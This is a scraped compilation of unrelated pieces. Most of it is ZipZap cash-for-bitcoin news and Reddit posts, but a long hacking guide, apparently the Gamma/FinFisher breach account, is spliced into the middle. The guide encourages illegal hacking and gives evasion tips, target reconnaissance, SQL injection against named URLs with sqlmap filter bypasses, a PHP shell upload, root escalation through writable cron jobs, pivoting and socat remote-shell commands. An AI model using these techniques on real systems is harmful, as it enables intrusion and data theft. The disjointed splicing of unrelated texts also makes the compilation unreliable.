COINDESK / ZipZap Resumes Cash-to-Bitcoin Services for UK ...
COINDESK / ZipZap Resumes Cash-to-Bitcoin Services for UK ...
ZipZap Resumes Cash-to-Bitcoin Services for UK Shoppers ...
ZipZap setzt Cash-to-Bitcoin-Services für UK-Shopper fort ...
28,000 Places to buy Bitcoin for Cash in the UK - ZipZap ...
ZipZap to Offer Cash-for-Bitcoin Service at 28,000 UK ...
ZipZap adds 25k locations in UK and 240k locations in Russia for Bitcoin for Cash, beginning Jan. 2014
A spokes person of ZipZap announced last Saturday on the Bitcoin Expo in London that ZipZap is adding bitcoin to their business model. That means that from the second week of January 2014 there will be 25k small shops in UK that will hand out Bitcoin for Cash and 240k locations in Russia. Basically every small shop that is selling lottery tickets or doing money exchange will give out Bitcoins automatically because they are already connected with ZipZap. He mentioned that briefly in the Q&A and didn't seem to realize that this is big news for the bitcoin community. I approached him later to make sure there was no misunderstanding and he confirmed it again. I think that is a very important and big step towards mainstream acceptance and this news should spread. I dont understand why ZipZap doesn't announce that officially. http://blog.zipzapinc.com/post/52339765880/the-future-of-bitcoin-is-mass-market-adoptionhttps://www.zipzapinc.comhttp://www.youtube.com/watch?v=LXgTeUsNztA
BuyBitcoin.sg introduces bitcoin purchase at 28,000 agents throughout United Kingdom today
www.BuyBitcoin.sg Bitcoin reseller BuyBitcoin.sg announced that it is now accepting cash payments at thousands of locations throughout United Kingdom. “We are excited to present the easiest and fastest way to buy bitcoins in United Kingdom” said Lasse Olesen, CEO of BuyBitcoin.sg. "When signing up at BuyBitcoin.sg you can choose to buy Bitcoins with a cash deposit. We simply send a cash payment confirmation that you deliver to one of our many agents. Within minutes the cash payment is confirmed and the bitcoins will be in your wallet." To provide this service, BuyBitcoin.sg has partnered with ZipZap Inc. to manage the cash payment infrastructure. In other words, BuyBitcoin.sg offers UK residents a consistent way to get bitcoins using cash without dealing with international payments. “This is a key piece of infrastructure that allows Bitcoin to grow further in the UK,” said Olesen. Try it for yourself at www.BuyBitcoin.sg. ABOUT BUYBITCOIN.SG BuyBitcoin.sg is a website of DGT Pte Ltd, an international Bitcoin reseller based in Singapore. DGT consists of a team with years of experience in the digital currency exchange space. Founder and CEO Lasse Olesen is also known as the founder of trusted European Bitcoin reseller Bitcoin Nordic, which has been serving the European market since early 2012. www.buybitcoin.sg www.bitcoinnordic.com ABOUT ZIPZAP INC. ZipZap, Inc. is the largest global cash payment network, enabling consumers to buy bitcoin with cash at over 28,000 payment center locations throughout the UK, with more territories coming soon. Founded in 2010, ZipZap is headquartered in San Francisco, California, with operations around the globe. For more information about ZipZap, visit http://www.zipzapinc.com. CONTACT DGT Pte Ltd (BuyBitcoin.sg), 1 North Bridge Road #03-23, High Street Centre, Singapore, 179094, E-mail: [email protected] ZipZap Inc., San Francisco, California, E-mail: [email protected] Instructions:
Bought some Bitcoin in a convenience store round the corner using cash
I got curious about the cheaper 'cash payment' option on Bittylicious, found out they go through ZipZap who are connected to PayZone, which has over 25k small shops in the UK signed up to it - the map on Bitty showed me there was a shop literally over the road from my nearest cash point, so signed up for 0.7 BTC for £135, printed out the barcode, went and got the cash out and handed them both over to the store owners, who had never come close to hearing about bitcoin, from what I could tell. The 0.7 BTC was in my wallet by the time I got home. Side question - is this the cheapest way to buy in UK? Edit: related news post
LTC on MTGox, Coinbase and BTC China CEO of the largest Bitcoin exchange in the world (BTC China), Bobby Lee, is the brother of the creator of Litecoin (Charles Lee_Coblee). Coblee works now at Coinbase... Well, you figure the schedule...
Well, I think it will be enough for the first part of the new year... And you, what do you expect for the new year ? (I may have been a little shy about my predictions...) Happy end-of-year celebration from Paris, France.
--1-- Introduction I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple it is, and to hopefully inform and inspire you to go out and hack shit. If you have no experience with programming or hacking, some of the text below might look like a foreign language. Check the resources section at the end to help you get started. And trust me, once you've learned the basics you'll realize this really is easier than filing a FOIA request. -- 2 -- Staying Safe This is illegal, so you'll need to take same basic precautions:
(Optional) While just having everything go over Tor thanks to Whonix is probably sufficient, it's better to not use an internet connection connected to your name or address. A cantenna, aircrack, and reaver can come in handy here.
As long as you follow common sense like never do anything hacking related outside of Whonix, never do any of your normal computer usage inside Whonix, never mention any information about your real life when talking with other hackers, and never brag about your illegal hacking exploits to friends in real life, then you can pretty much do whatever you want with no fear of being v&. NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable for some things like web browsing, when it comes to using hacking tools like nmap, sqlmap, and nikto that are making thousands of requests, they will run very slowly over Tor. Not to mention that you'll want a public IP address to receive connect back shells. I recommend using servers you've hacked or a VPS paid with bitcoin to hack from. That way only the low bandwidth text interface between you and the server is over Tor. All the commands you're running will have a nice fast connection to your target. -- 3 -- Mapping out the target Basically I just repeatedly use fierce.pl, whois lookups on IP addresses and domain names, and reverse whois lookups to find all IP address space and domain names associated with an organization. For an example let's take Blackwater. We start out knowing their homepage is at academi.com. Running fierce.pl -dns academi.com we find the subdomains:
Doing a whois lookup on academi.com reveals it's also registered to the same address, so we'll use that as a string to search with for the reverse whois lookups. As far as I know all the actual reverse whois lookup services cost money, so I just cheat with google:
Now run fierce.pl -range on the IP ranges you find to lookup dns names, and fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more whois lookups and repeat the process until you've found everything. Also just google the organization and browse around its websites. For example on academi.com we find links to a careers portal, an online store, and an employee resources page, so now we have some more:
If you repeat the whois lookups and such you'll find academiproshop.com seems to not be hosted or maintained by Blackwater, so scratch that off the list of interesting IPs/domains. In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com was simply a whois lookup of finfisher.com which found it registered to the name "FinFisher GmbH". Googling for:
"FinFisher GmbH" inurl:domaintools
finds gamma-international.de, which redirects to finsupport.finfisher.com ...so now you've got some idea how I map out a target. This is actually one of the most important parts, as the larger the attack surface that you are able to map out, the easier it will be to find a hole somewhere in it. -- 4 -- Scanning & Exploiting Scan all the IP ranges you found with nmap to find all services running. Aside from a standard port scan, scanning for SNMP is underrated. Now for each service you find running:
Is it exposing something it shouldn't? Sometimes companies will have services running that require no authentication and just assume it's safe because the url or IP to access it isn't public. Maybe fierce found a git subdomain and you can go to git.companyname.come/gitweb/ and browse their source code.
Is it horribly misconfigured? Maybe they have an ftp server that allows anonymous read or write access to an important directory. Maybe they have a database server with a blank admin password (lol stratfor). Maybe their embedded devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's default password.
Is it running an old version of software vulnerable to a public exploit?
Webservers deserve their own category. For any webservers, including ones nmap will often find running on nonstandard ports, I usually:
Browse them. Especially on subdomains that fierce finds which aren't intended for public viewing like test.company.com or dev.company.com you'll often find interesting stuff just by looking at them.
Run nikto. This will check for things like webserve.svn/, webservebackup/, webservephpinfo.php, and a few thousand other common mistakes and misconfigurations.
Identify what software is being used on the website. WhatWeb is useful
First try that against all services to see if any have a misconfiguration, publicly known vulnerability, or other easy way in. If not, it's time to move on to finding a new vulnerability: 5) Custom coded web apps are more fertile ground for bugs than large widely used projects, so try those first. I use ZAP, and some combination of its automated tests along with manually poking around with the help of its intercepting proxy. 6) For the non-custom software they're running, get a copy to look at. If it's free software you can just download it. If it's proprietary you can usually pirate it. If it's proprietary and obscure enough that you can't pirate it you can buy it (lame) or find other sites running the same software using google, find one that's easier to hack, and get a copy from them. For finsupport.finfisher.com the process was:
Start nikto running in the background.
Visit the website. See nothing but a login page. Quickly check for sqli in the login form.
See if WhatWeb knows anything about what software the site is running.
WhatWeb doesn't recognize it, so the next question I want answered is if this is a custom website by Gamma, or if there are other websites using the same software.
I view the page source to find a URL I can search on (index.php isn't exactly unique to this software). I pick Scripts/scripts.js.php, and google: allinurl:"Scripts/scripts.js.php"
I find there's a handful of other sites using the same software, all coded by the same small webdesign firm. It looks like each site is custom coded but they share a lot of code. So I hack a couple of them to get a collection of code written by the webdesign firm.
At this point I can see the news stories that journalists will write to drum up views: "In a sophisticated, multi-step attack, hackers first compromised a web design firm in order to acquire confidential data that would aid them in attacking Gamma Group..." But it's really quite easy, done almost on autopilot once you get the hang of it. It took all of a couple minutes to:
google allinurl:"Scripts/scripts.js.php" and find the other sites
Notice they're all sql injectable in the first url parameter I try.
Realize they're running Apache ModSecurity so I need to use sqlmap with the option --tamper='tampemodsecurityversioned.py'
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
reveal that finsupport also has print.php and it is injectable. And it's database admin! For MySQL this means you can read and write files. It turns out the site has magicquotes enabled, so I can't use INTO OUTFILE to write files. But I can use a short script that uses sqlmap --file-read to get the php source for a URL, and a normal web request to get the HTML, and then finds files included or required in the php source, and finds php files linked in the HTML, to recursively download the source to the whole site. Looking through the source, I see customers can attach a file to their support tickets, and there's no check on the file extension. So I pick a username and password out of the customer database, create a support request with a php shell attached, and I'm in! -- 5 -- (fail at) Escalating < got r00t? >
Root over 50% of linux servers you encounter in the wild with two easy scripts, Linux_Exploit_Suggester, and unix-privesc-check. finsupport was running the latest version of Debian with no local root exploits, but unix-privesc-check returned:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data
can write to /etc/cron.hourly/webalizer so I add to /etc/cron.hourly/webalizer:
wait an hour, and ....nothing. Turns out that while the cron process is running it doesn't seem to be actually running cron jobs. Looking in the webalizer directory shows it didn't update stats the previous month. Apparently after updating the timezone cron will sometimes run at the wrong time or sometimes not run at all and you need to restart cron after changing the timezone. ls -l /etc/localtime shows the timezone got updated June 6, the same time webalizer stopped recording stats, so that's probably the issue. At any rate, the only thing this server does is host the website, so I already have access to everything interesting on it. Root wouldn't get much of anything new, so I move on to the rest of the network. -- 6 -- Pivoting The next step is to look around the local network of the box you hacked. This is pretty much the same as the first Scanning & Exploiting step, except that from behind the firewall many more interesting services will be exposed. A tarball containing a statically linked copy of nmap and all its scripts that you can upload and run on any box is very useful for this. The various nfs-* and especially smb-* scripts nmap has will be extremely useful. The only interesting thing I could get on finsupport's local network was another webserver serving up a folder called 'qateam' containing their mobile malware. -- 7 -- Have Fun Once you're in their networks, the real fun starts. Just use your imagination. While I titled this a guide for wannabe whistleblowers, there's no reason to limit yourself to leaking documents. My original plan was to:
Hack Gamma and obtain a copy of the FinSpy server software
Find vulnerabilities in FinSpy server.
Scan the internet for, and hack, all FinSpy C&C servers.
Identify the groups running them.
Use the C&C server to upload and run a program on all targets telling them who was spying on them.
Use the C&C server to uninstall FinFisher on all targets.
Join the former C&C servers into a botnet to DDoS Gamma Group.
It was only after failing to fully hack Gamma and ending up with some interesting documents but no copy of the FinSpy server software that I had to make due with the far less lulzy backup plan of leaking their stuff while mocking them on twitter. Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password already so I can move on to step 2! -- 8 -- Other Methods The general method I outlined above of scan, find vulnerabilities, and exploit is just one way to hack, probably better suited to those with a background in programming. There's no one right way, and any method that works is as good as any other. The other main ways that I'll state without going into detail are: 1) Exploits in web browers, java, flash, or microsoft office, combined with emailing employees with a convincing message to get them to open the link or attachment, or hacking a web site frequented by the employees and adding the browsejava/flash exploit to that. This is the method used by most of the government hacking groups, but you don't need to be a government with millions to spend on 0day research or subscriptions to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit for a couple thousand, and rent access to one for much less. There's also metasploit browser autopwn, but you'll probably have better luck with no exploits and a fake flash updater prompt. 2) Taking advantage of the fact that people are nice, trusting, and helpful 95% of the time. The infosec industry invented a term to make this sound like some sort of science: "Social Engineering". This is probably the way to go if you don't know too much about computers, and it really is all it takes to be a successful hacker. -- 9 -- Resources Links:
http://www.dest-unreach.org/socat/ Get usable reverse shells with a statically linked copy of socat to drop on your target and: target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM host$ socat file:tty,raw,echo=0 tcp-connect:localhost:PORTNUM It's also useful for setting up weird pivots and all kinds of other stuff.
The Web Application Hacker's Handbook
Hacking: The Art of Exploitation
The Database Hacker's Handbook
The Art of Software Security Assessment
A Bug Hunter's Diary
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
Aside from the hacking specific stuff almost anything useful to a system administrator for setting up and administering networks will also be useful for exploring them. This includes familiarity with the windows command prompt and unix shell, basic scripting skills, knowledge of ldap, kerberos, active directory, networking, etc. -- 10 -- Outro You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a tool. It's not selling hacking tools that makes Gamma evil. It's who their customers are targeting and with what purpose that makes them evil. That's not to say that tools are inherently neutral. Hacking is an offensive tool. In the same way that guerrilla warfare makes it harder to occupy a country, whenever it's cheaper to attack than to defend it's harder to maintain illegitimate authority and inequality. So I wrote this to try to make hacking easier and more accessible. And I wanted to show that the Gamma Group hack really was nothing fancy, just standard sqli, and that you do have the ability to go out and take similar action. Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned hackers, dissidents, and criminals!
So the other day I used ZipZap service, via Bittylicious to buy some bitcoins for cash and paid via a visit to one of the many 'payzone' outlets available. Since the guy in the shop didn't have a scanner to scan the barcode on the pdf from bittylicious, i persuaded him to let me see the payzone machine and found how to directly key the number in to do the transaction... Anyway while we were figuring it out, He asked what the payment was for an I began to explain him about bitcoins. Whilst we were talking my bitcoins arrived and he was surprised at the speed of it. Then I told him of the success of the few bitcoin atms in UK and showed the article about the bristol satoshipoint ATM doing £38k turnover in a month and netting a nice commission in the process. He was intrigued so i continued talking about how he could easily set up as a bitcoin retail outlet, without an atm... profiting not only from a markup on the bitcoins and his commissions from payzone, but he could do it with no inital outlay and no work other than setting up a bitcoin wallet on his phone, verifiying with bittylicious or zipzap and sticking a 'We sell bitcoin' sticker in the window. He is now doing a bit research and reading the uk bitcoin tax guidelines etc as well as checking if any aml / kyc best practice might be advised when selling small amounts of bitcoin for cash directly to his customers. Ill update this thread with the location if and when he goes live with it, in the meantime, there's lots of payzones!
Global cash transaction network ZipZap has formally reinstated its bitcoin buying service at more than 20,000 partner retail locations in the UK. The news follows an abrupt halt of the company’s digital currency services this March, when its UK-based payment processor PayPoint said it would require more regulatory clarification regarding bitcoin to support the offering. […] ZipZap to Offer Cash-for-Bitcoin Service at 28,000 UK Locations UK residents will soon be able to walk into one of 28,000 shops across the nation and pay for bitcoins in cash, thanks to a new deal ... We’ve just added ZipZap to BittyBot – the UK’s number one Bitcoin price comparison website.. ZipZap are a California-based global payments network, currently providing cash-to-bitcoin services in the US, UK and Brazil.. In the UK ZipZap have partnered with payment processor Payzone which means you can exchange your cash for bitcoin at over 20,000 retail locations across the UK. Global cash transaction network ZipZap has formally reinstated its bitcoin buying service at more than 20,000 partner retail locations in the UK. The news follows an abrupt halt of the company’s digital currency services this March, when its UK-based payment processor PayPoint said it would requi... Bitcoin is a distributed, worldwide, decentralized digital money … Press J to jump to the feed. Press question mark to learn the rest of the keyboard shortcuts. r/Bitcoin. log in sign up. User account menu. 272. 28,000 Places to buy Bitcoin for Cash in the UK - ZipZap. Close. 272. Posted by. u/califreshed. 5 years ago. Archived. 28,000 Places to buy Bitcoin for Cash in the UK - ZipZap ...
Alan Safahi, Zip Zap - The European Bitcoin Convention - 2013 Amsterdam
741 hz Removes Toxins and Negativity, Cleanse Aura, Spiritual Awakening, Tibetan Bowls - Duration: 2:16:00. Music for body and spirit - Meditation music Recommended for you Close. This video is unavailable. Close. This video is unavailable. Bonjour a toi mon cher ami ! Si tu lit cette description c'est que naturellement tu es sur ma chaîne ! Je te conseil fort de t'abonner si le contenu te plait... Eric Benz, VP Global Business Development at Zipzap, speaking at The North American Bitcoin Conference. http://www.ezipzap.com http://www.btcmiami.com